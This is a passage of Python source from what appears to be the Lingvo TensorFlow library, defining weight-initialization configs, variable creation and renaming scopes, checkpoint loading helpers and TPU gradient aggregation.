static_shape.append(symbolic.ToStatic(dim))
else:
static_shape.append(dim)
return static_shape
else:
return shape.value if isinstance(shape, tf.Dimension) else shape
def Zeros(shape, *args, **kwargs):
return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler(object):
"""A reservoir sampler.
This class implements reservoir sampling: Given a limit of `num_samples` total
samples, this class maintains a uniform probability (1 / `num_samples`) of
keeping any item dynamically added to the sampler.
See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
"""
def __init__(self, num_samples):
assert num_samples > 0
self._num_samples = num_samples
self._num_seen_items = 0
self._samples = []
def Add(self, item):
"""Add item to sampler."""
self._num_seen_items += 1
if len(self._samples) < self._num_samples:
self._samples.append(item)
return
index = np.random.randint(0, self._num_seen_items)
if index < self._num_samples:
self._samples[index] = item
@property
def samples(self):
"""Fetch the current samples from the sampler."""
return self._samples
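# Illustrative use of the reservoir sampler above:
#   sampler = UniformSampler(num_samples=10)
#   for item in stream:        # arbitrarily long stream
#     sampler.Add(item)
#   subset = sampler.samples   # at most 10 items, each kept with equal probability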
class RNNCellStateInit(object):
"""State initialization functions for RNN cell init state."""
@staticmethod
def _Params(method, seed):
p = hyperparams.Params()
p.Define('method', method,
'Initialization method. Should be one of zeros, random_normal.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Zeros():
"""tf.zeros()."""
return RNNCellStateInit._Params('zeros', seed=None)
@staticmethod
def RandomNormal(seed=None):
"""tf.random.normal()."""
return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
"""Initial state definitions for RNN cell implementations.
Args:
shape: An array of ints/symbols specifying the shape of the state.
init: Hyperparameters as returned by one of the static implementations in
RNNCellStateInit.
dtype: The dtype of the states. Defaults to tf.float32.
name: An optional name for the operation.
is_eval: Bool, set to True if we need special behavior in eval mode.
Returns:
A Tensor of the specified shape, and sampled from the distribution as
defined by the init parameters.
"""
shape = ToStaticShape(shape)
if init is None:
init = DefaultRNNCellStateInit()
if dtype is None:
dtype = tf.float32
method = init.method
if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
elif method in ['random_normal']:
init_state = tf.random.normal(
shape=shape, dtype=dtype, name=name, seed=init.seed)
else:
raise ValueError('Initialization method (%s) not supported.' % method)
return init_state
class WeightInit(object):
"""Static class providing weight initialization config params."""
@staticmethod
def _Params(method, scale, seed):
p = hyperparams.Params()
p.Define('method', method, 'Initialization method.')
p.Define('scale', scale, 'Initialization scale.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Gaussian(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1.0)."""
return WeightInit._Params('gaussian', scale, seed)
@staticmethod
def Uniform(scale=1.0, seed=None):
"""scale * tf.random.uniform(-1.0, 1.0)."""
return WeightInit._Params('uniform', scale, seed)
@staticmethod
def UniformPositive(scale=1.0, seed=None):
"""scale * tf.random.uniform(0., 1.0)."""
return WeightInit._Params('uniform_positive', scale, seed)
@staticmethod
def Xavier(scale=1.0, seed=None):
"""Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def XavierWithFixupParams(scale=1.0,
depth=1.0,
layers_per_residual_block=1.0,
seed=None):
"""Xavier initialization with Fixup."""
scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def GeoMeanXavier(scale=1.0, seed=None):
"""A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
return WeightInit._Params('geo_mean_xavier', scale, seed)
@staticmethod
def Constant(scale=1.0):
"""scale."""
return WeightInit._Params('constant', scale, 0)
@staticmethod
def TruncatedGaussian(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1.0)."""
return WeightInit._Params('truncated_gaussian', scale, seed)
@staticmethod
def GaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('gaussian_sqrt_dim', scale, seed)
@staticmethod
def GaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)
@staticmethod
def GaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)
@staticmethod
def UniformSqrtDim(scale=1.0, seed=None):
"""scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
return WeightInit._Params('uniform_sqrt_dim', scale, seed)
@staticmethod
def UniformUnitScaling(scale=1.0, seed=None):
"""scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
return WeightInit._Params('uniform_unit_scaling', scale, seed)
@staticmethod
def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)
@staticmethod
def KaimingUniformFanInRelu(scale=1.0, seed=None):
return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)
@staticmethod
def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)
_DEFAULT_XAVIER_INIT = 1.000001
def DefaultParamInit():
# Here we use 1.000001 as a signature indicating that the user picked up the
# default param initializer.
return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
def IsDefaultParamInit(p):
return (p.method == 'xavier' and p.scale == _DEFAULT_XAVIER_INIT and
p.seed is None)
def WeightParams(shape,
init=None,
dtype=None,
collections=None,
xla_num_partitions=None,
xla_partition_dim=None):
"""Returns a hyperparams for a weight variable given the shape/init/dtype."""
if init is None:
init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
if dtype is None:
dtype = tf.float32
if collections is None:
collections = []
p = hyperparams.Params()
p.Define('dtype', dtype, 'The weight data type.')
p.Define('shape', shape, 'The weight shape.')
p.Define('init', init, 'Initialization method.')
p.Define('collections', collections,
'Variable collections this weight belongs to.')
p.Define('xla_num_partitions', xla_num_partitions, 'partitioning')
p.Define('xla_partition_dim', xla_partition_dim, 'partitioning')
return p
def FindNeeded(endpoints):
"""List names of tensors and operations required to compute endpoints."""
names_seen = set()
queue = []
for e in Flatten(endpoints):
if isinstance(e, tf.Operation):
queue.append(e)
else:
queue.append(e.op)
while queue:
op = queue.pop()
name = op.name
if name not in names_seen:
names_seen.add(name)
names_seen.update((o.name for o in op.outputs))
queue.extend(i.op for i in op.inputs)
queue.extend(op.control_inputs)
return names_seen
def FindNeededInList(tensor_list, endpoints):
"""Return tensors from tensor_list needed to compute any of endpoints."""
all_needed = FindNeeded(endpoints)
return [t for t in tensor_list if t.name in all_needed]
class _CollectionGetter(object):
"""Get graph local value from a defined collection."""
def __init__(self, key, default_factory):
self._key = key
self._default_factory = default_factory
def __call__(self):
collection = tf.get_collection(self._key)
if collection:
assert len(collection) == 1
return collection[0]
value = self._default_factory()
tf.add_to_collection(self._key, value)
return value
def SanitizeScopeKey(key):
"""Removes invalid symbols from name_scope keys."""
return key.replace('[', '_').replace(']', '')
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With OPPORTUNISTIC_VARIABLE_REUSE==True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse existing variables or create new ones
_OPPORTUNISTIC_VARIABLE_REUSE_KEY = ('__lingvo_opportunistic_variable_reuse',)
_get_opportunistic_variable_reuse = _CollectionGetter(
_OPPORTUNISTIC_VARIABLE_REUSE_KEY, lambda: [False])
_VARIABLE_RENAME_RULES_KEY = ('__lingvo_variable_rename_rules',)
_get_rename_rules_stack = _CollectionGetter(_VARIABLE_RENAME_RULES_KEY,
lambda: [])
@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
opportunistic_var_reuse = _get_opportunistic_variable_reuse()
old_val = opportunistic_var_reuse[0]
opportunistic_var_reuse[0] = enable_opportunistic_reuse
yield
opportunistic_var_reuse[0] = old_val
def GetOpportunisticVariableReuse():
"""Get the current variable reuse setting."""
opportunistic_var_reuse = _get_opportunistic_variable_reuse()
return opportunistic_var_reuse[0]
@contextlib.contextmanager
def VariableRenameScope(renames):
"""Append the renaming rules to the stack of renames.
Args:
renames: pairs of (regexp, new_name_format). If the regexp matches, the
new_name_format will be interpolated using the matched groups.
Yields:
scope in which the renaming rules are applied
"""
rename_rules_stack = _get_rename_rules_stack()
rename_rules_stack.append(renames)
yield
rename_rules_stack.pop()
def GetVariableName(name):
"""Get variable name after application of all renaming rules.
Args:
name: untransformed variable name with scope_name prepended
Returns:
name possibly modified using renaming rules
"""
matched = False
new_name = name
for renames in _get_rename_rules_stack():
for regexp, name_format in renames:
match = re.match(regexp, name)
if match:
if matched:
tf.logging.warning('Multiple matches for: %s', name)
matched = True
new_name = name_format % match.groups()
if new_name != name:
tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
return new_name
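# Illustrative sketch (not part of the original code): GetVariableName applies
# the rename rules pushed by VariableRenameScope. The scope names and the rule
# below are made up.
#
#   with VariableRenameScope([(r'^old_tower/(.*)', 'new_tower/%s')]):
#     GetVariableName('old_tower/conv/w')  # -> 'new_tower/conv/w'
#     GetVariableName('other/conv/w')      # unchanged: no rule matches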
def GenerateSeedFromName(name):
"""Generate a random seed from a name string."""
md5 = hashlib.md5()
md5.update(six.ensure_binary(name))
return int(md5.hexdigest(), 16) % (2**31 - 1)
# To keep track of all the variables ever gets created by the CreateVariable
# routine below.
_ALL_VARS_KEY = ('__lingvo_all_vars',)
_get_all_vars = _CollectionGetter(_ALL_VARS_KEY, lambda: {})
_VARIABLE_SHAPE_PREFIXES = _ThreadLocalStack().stack
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
"""Add a shape prefix to variable created by CreateVariable().
Args:
    shape_prefix: a positive integer to prepend to the shapes of variables
      created within this context.
Yields:
None.
"""
assert shape_prefix > 0, ('%s' % shape_prefix)
_VARIABLE_SHAPE_PREFIXES.append(shape_prefix)
yield
_VARIABLE_SHAPE_PREFIXES.pop()
def GetVariableShapePrefixes():
"""Return the list of shape prefixes for CreateVariable()."""
return _VARIABLE_SHAPE_PREFIXES
def GetFanInFanOut(shape):
"""Returns (fan_in, fan_out) of a weight variable of the give shape."""
if not shape:
return None, None
if len(shape) < 1:
return 1, 1
elif len(shape) == 1:
# Following _compute_fans() from TF's init_ops.py.
return shape[0], shape[0]
else:
receptive_field_size = 1
for s in shape[:-2]:
receptive_field_size *= s
fan_in = shape[-2] * receptive_field_size
fan_out = shape[-1] * receptive_field_size
return fan_in, fan_out
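# Illustrative sketch (not part of the original code): fan-in/fan-out for a
# 3x3 conv kernel with 8 input and 16 output channels; all dimensions before
# the last two are treated as the receptive field.
#
#   GetFanInFanOut([3, 3, 8, 16])  # -> (72, 144): 3*3*8 = 72, 3*3*16 = 144
#   GetFanInFanOut([512])          # -> (512, 512)
#   GetFanInFanOut([])             # -> (None, None)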
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
tf.identity(var), var pair. The tf.identity() node is colocated
with var. In the case of FLAGS.no_identity_on_vars, simply returns
a var, var pair.
"""
p = params.Copy()
assert isinstance(p, hyperparams.Params)
dtype = p.dtype
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
p.Set(shape=shape)
dim0 = 1
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
if tf.get_default_graph().seed is not None:
    # We are in a program/test which needs deterministic randomization.
if seed is None:
if default_seed is not None:
seed = default_seed
else:
# We are not given a per-variable random seed. We use hash of
# variable name as a stable random seed.
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
seed = GenerateSeedFromName(var_name)
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
init_dtype = dtype.real_dtype
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout'
]:
v_init = init_ops.random_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = init_ops.random_uniform_initializer(
minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_positive']:
v_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_unit_scaling']:
v_init = init_ops.uniform_unit_scaling_initializer(
factor=scale, seed=seed, dtype=init_dtype)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = init_ops.truncated_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
# pylint: disable=unused-argument
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
if not shape:
raise ValueError(
'\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
# pylint: enable=unused-argument
v_init = XavierUniform
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = init_ops.random_uniform_initializer(
minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
else:
assert False, 'init_type not supported.'
if dtype == tf.complex64:
def ComplexWrapper(init):
def _Wrapper(shape, dtype, partition_info):
# A more complex alternative may be to use the init function for
# magnitudes and uniform random for phases instead.
shape = [2] + shape
value = init(shape, init_dtype, partition_info)
return tf.complex(value[0], value[1])
return _Wrapper
v_init = ComplexWrapper(v_init)
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
def GetVar(reuse=reuse):
"""reuse: Whether to reuse the variables."""
var_shape = GetVariableShapePrefixes() + list(shape)
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=scope.use_resource or use_resource_variables())
with tf.variable_scope(var_scope), \
tf.variable_scope(var_name, reuse=reuse) as scope:
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return tf.get_variable(
'var',
var_shape,
dtype,
v_init,
collections=collections,
trainable=trainable,
validate_shape=True if var_shape is not None else False,
synchronization=synchronization,
aggregation=aggregation)
else:
with tf.device(''):
return tf.get_variable(
'var',
var_shape,
dtype,
v_init,
collections=collections,
trainable=trainable,
validate_shape=True if var_shape is not None else False,
synchronization=synchronization,
aggregation=aggregation)
if _get_opportunistic_variable_reuse()[0]:
try:
var = GetVar()
except ValueError: # Possibly the variable already exists
var = GetVar(reuse=True)
else:
var = GetVar()
# Partitioning annotation
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p, ('Cached config:\n %s vs new config:\n %s' %
(cached.ToText(), p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.Copy()
for col in p.collections:
tf.add_to_collection(col, var)
if _FromGlobal('no_identity_on_vars'):
#with tf.device(var.device):
return var, var
else:
# This tf.identity colocated with var.
#with tf.device(var.device):
#if p.xla_num_partitions:
# xla_ref = xla_sharding.split(var, p.xla_partition_dim, p.xla_num_partitions, use_sharding_op=True)
# return xla_ref, var
return tf.identity(var), var
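# Illustrative sketch (not part of the original code): creating a variable from
# a WeightParams config. The name and shape are placeholders; the first return
# value is the tf.identity() wrapper (or the variable itself when
# FLAGS.no_identity_on_vars is set), the second is the tf.Variable.
#
#   wp = WeightParams(shape=[8, 4], init=WeightInit.Xavier(1.0),
#                     dtype=tf.float32)
#   w, w_var = CreateVariable('my_layer/w', wp)  # 'my_layer/w' is hypothetical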
_global_variable_scope = None
def GetGlobalVariableScope():
"""Gets the global variable scope (as if no variable_scope has been set).
Returns:
The VariableScope corresponding to as if no tf.variable_scope is in effect.
"""
if not _global_variable_scope:
# Each thread gets its own default global variable scope, and we take
# advantage of that in order to get a top-level scope. This avoids the
# need to call tf.get_variable_scope() at the module level, which allows
# this module to be imported without modifying global state (i.e. creating
# the default graph). It is important to not mutate the global state at
    # module load time, because it lets us flip flags after import that affect
# core TensorFlow behavior.
def Initialize():
global _global_variable_scope
_global_variable_scope = tf.get_variable_scope()
t = threading.Thread(target=Initialize)
t.start()
t.join()
return _global_variable_scope
_GLOBAL_STEP_STACK = []
@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
_GLOBAL_STEP_STACK.append(global_step_tensor)
try:
yield
except:
raise
finally:
_GLOBAL_STEP_STACK.pop()
def GetGlobalStep():
"""Return the global_step."""
if _GLOBAL_STEP_STACK:
return _GLOBAL_STEP_STACK[-1]
return tf.train.get_global_step()
def GetOrCreateGlobalStepVar():
"""Return the global_step variable, creating it if it does not exist.
Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.
Returns:
The global_step variable, or a new created one if it does not exist.
"""
with tf.variable_scope(
GetGlobalVariableScope(), use_resource=use_resource_variables()):
return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
if not isinstance(lines, (list, tuple)):
lines = lines.split('\n')
for line in lines:
tf.logging.info('%s: %s', label, line)
def _LogPlacement(label, theta, copy):
"""Logs theta and its copy's device placement."""
def GetDevices(m):
"""Flatten a `.NestedMap` m and extracts each value's device."""
return [x.device for x in m.Flatten()]
tf.logging.info('=== %s ===', label)
LogMultiLines(
label,
theta.Pack([('%s -> %s' % (x[0], x[1]))
for x in zip(GetDevices(theta), GetDevices(copy))
]).DebugString())
tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
"""Creates local copy of theta and shards across devices device list.
Leaves variables intact.
Args:
theta: a `.NestedMap` of variables.
device_list: list of devices to shard across. If None, defaults to a list
[''].
label: Logging label.
Returns:
    A `.NestedMap` of identity()-wrapped theta.
"""
class AddIdentity(object):
def __init__(self, device_list):
self._list = device_list if device_list else ['']
self._index = 0
def __call__(self, x):
if isinstance(x, tf.Variable):
return x
with tf.device(self._list[self._index % len(self._list)]):
self._index += 1
return tf.identity(x)
copy = theta.Transform(AddIdentity(device_list))
_LogPlacement(label, theta, copy)
return copy
def _GetVarsToLoad(all_vars, variable_loading_rules, var_ignore_rules):
"""Determines variables to load and their names in checkpoint."""
# This list contains mappings from var names as they appear in the checkpoint
# to the vars in our model they correspond to.
vars_to_load = []
for model_var in all_vars:
for regexp, name_format in variable_loading_rules:
match = re.match(regexp, model_var.name)
# Skip if var doesn't match the loading rules, or if it should be ignored.
if not match or any(
re.match(r, model_var.name) for r in var_ignore_rules):
continue
checkpoint_var_name = name_format % match.groups()
if checkpoint_var_name.endswith(':0'):
checkpoint_var_name = checkpoint_var_name[:-2]
tf.logging.info('Loading %s from %s', model_var, checkpoint_var_name)
vars_to_load.append((checkpoint_var_name, model_var))
break
return vars_to_load
def OverrideVarsFromCheckpoint(sess, all_vars, checkpoint_path,
variable_loading_rules, var_ignore_rules):
"""Overrides variables from a provided checkpoint."""
vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
var_ignore_rules)
if not vars_to_load:
raise ValueError(('Variable loading rules did not match any vars. '
'All known: %r') % [v.name for v in all_vars])
load_var_names = sorted([v.name for _, v in vars_to_load])
tf.logging.info('Overriding vars from checkpoint: %r', load_var_names)
while vars_to_load:
# When restoring, it's possible the same value in the checkpoint
# can be restored to multiple variables (e.g. during
# distillation). However, tf.train.Saver, since it's used for
# both saving and restoring, requires the name in the checkpoint
# to be unique for each variable. So, we call it multiple times
# with a unique set of names each time.
unique_vars_to_load = {}
remaining_vars_to_load = []
for k, v in vars_to_load:
if k not in unique_vars_to_load:
unique_vars_to_load[k] = v
else:
remaining_vars_to_load.append((k, v))
tf.train.Saver(var_list=unique_vars_to_load).restore(sess, checkpoint_path)
vars_to_load = remaining_vars_to_load
def OverrideVarsFromCheckpoints(session, all_vars, ckpts_loading_rules):
"""Overrides model variables from checkpoints.
Args:
session: Tensorflow session.
all_vars: List of all the parameters in the model.
    ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
      Checkpoint path must be a path to a pretrained model, and loading rules
      are expected to be a tuple of two lists: the first consists of tuples of
      strings defining (regex to match parameter names in the model to
      override, format string to determine the corresponding var in the
      checkpoint), and the second consists of regexes matching parameter names
      in the model which should not be overridden, even if they match the
      loading rules.
Raises:
ValueError: if colliding vars exist or loading rules is not a list.
"""
if len(ckpts_loading_rules) > 1:
tf.logging.info('Overriding vars from multiple checkpoints.')
var_refs_overridden = set()
for ckpt_path, loading_rules in ckpts_loading_rules.items():
tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)
if not isinstance(loading_rules, tuple):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
if len(loading_rules) != 2 or not all(
isinstance(l, list) for l in loading_rules):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
# Filter the model variables to be overridden.
var_refs_to_override = [
var[1].experimental_ref()
for var in _GetVarsToLoad(all_vars, loading_rules[0], loading_rules[1])
]
overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
if overlap_refs:
raise ValueError('Colliding variables to override: %s' % overlap_refs)
OverrideVarsFromCheckpoint(session, all_vars, ckpt_path, loading_rules[0],
loading_rules[1])
var_refs_overridden.update(var_refs_to_override)
tf.logging.info('Model variables overridden: %s', var_refs_overridden)
def ComputeGradientsSimple(loss, all_vars, grad_aggregation_method,
colocate_gradients_with_ops, gate_gradients):
return tf.gradients(
loss,
all_vars,
aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients)
def ComputeTpuEmbeddingGradients(loss, activation_dict, tpu_embedding):
"""Returns a TpuEmbedding SendGradient op.
Args:
loss: The loss to backprop from.
activation_dict: String feature -> embedding activations dict.
tpu_embedding: TPUEmbedding instance.
"""
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
loss *= tf.constant(1.0 / shards, dtype=loss.dtype)
grads = tf.gradients(loss, list(activation_dict.values()))
feature_to_gradient_dict = py_collections.OrderedDict(
zip(list(activation_dict.keys()), grads))
send_gradient_op = tpu_embedding.generate_send_gradients_op(
feature_to_gradient_dict)
return send_gradient_op
def _ComputeGradientsTpu(loss,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
skip_zero_gradients=None,
use_bf16_gradients_ar=False):
"""Computes gradients for local loss across whole TPU cluster.
  This implementation specializes for the case where weight params may be used
  a different number of times in the forward computation, so that gradients
  should be normalized by the actual number of times they are computed.
TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
one.
Args:
loss: The loss to backprop from.
all_vars: Vars with respect to which gradients are to be computed.
grad_aggregation_method: aggregation method to use when calling
tf.gradients.
colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
with the original op.
gate_gradients: boolean, flag to be passed to tf.gradients.
skip_zero_gradients: whether to skip zero gradients during aggregation.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce.
Returns:
Gradients to be passed back.
Raises:
ValueError: upon invalid arguments.
"""
if not skip_zero_gradients:
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
assert shards
loss *= tf.constant(1.0 / shards, dtype=loss.dtype)
# Computes the gradients.
# Sum the grads so that we can compute statistics across the whole batch.
all_grads = ComputeGradientsSimple(loss, all_vars, grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients)
# NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
# we need to scale the grads *after* the cross_replica_sum to
# match GPU version!
# TODO(cwhipkey): should we do something different here? - we could do
# some operations on the gradients before the aggregation (see comments in
# tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
# for some more details).
aggregated_grads = []
for g in all_grads:
if g is None:
aggregated_grads.append(None)
continue
if use_bf16_gradients_ar:
g = tf.cast(g, tf.bfloat16)
with tf.ops.colocate_with(g):
if skip_zero_gradients is None:
# loss is already scaled by 1/shards.
normalized_g = tf.tpu.cross_replica_sum(g)
else:
# Compute the cross-replica mean of 'g', skipping zero gradients.
# Q(yonghui): Is there a better way to detect a non-zero gradient?
# Note(yonghui): gradient of a weight can be zero if that
# weight is not used in the forward computation, e.g. as in
# switchable layers in neural architecture search, pruned by channel
# mask, or sparsified.
if skip_zero_gradients == 'weight':
# Same shape as 'g'.
g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
elif skip_zero_gradients == 'variable':
# A variable-wide 0/1 scalar.
g_is_non_zero = tf.cast(
tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
else:
raise ValueError('Unknown skip_zero_gradients: %s' %
skip_zero_gradients)
num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
aggregated_grads.append(normalized_g)
return aggregated_grads
class VarGrad(object):
"""A class that holds a variable and a gradient."""
_VAR_GRAD = py_collections.namedtuple('VarGradNamedTuple', ['var', 'grad'])
def __init__(self, *args, **kwargs):
self._var_grad = self._VAR_GRAD(*args, **kwargs)
def __getitem__(self, key):
return self._var_grad[key]
def __getattr__(self, key):
return getattr(self._var_grad, key)
def __iter__(self):
return iter(self._var_grad)
def __repr__(self):
return 'VarGrad(%r, %r)' % (self._var_grad.var, self._var_grad.grad)
def ComputeGradients(
loss,
vmap,
grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
colocate_gradients_with_ops=True,
gate_gradients=False,
compute_gradients_fn=None,
skip_zero_gradients=None,
use_bf16_gradients_ar=False):
"""Computes gradients of variables in vmap w.r.t loss.
Args:
loss: A scalar Tensor.
vmap: A `.NestedMap` of variables.
grad_aggregation_method: Specifies the method used to combine gradient
terms. Accepted values are constants defined in the class
AggregationMethod.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
gate_gradients: If True, add a tuple around the gradients returned for an
      operation. This avoids some race conditions.
compute_gradients_fn: Function to use to compute gradients. If None, use
default. compute_gradients_fn should have the same signature as this
function, but without the last argument.
skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
in case where some weights may not be used in forward computation, e.g.,
      sparsely activated networks or switchable layers in neural architecture
search. Only applicable on TPU.
Possible values are:
* None: do not skip zero gradients;
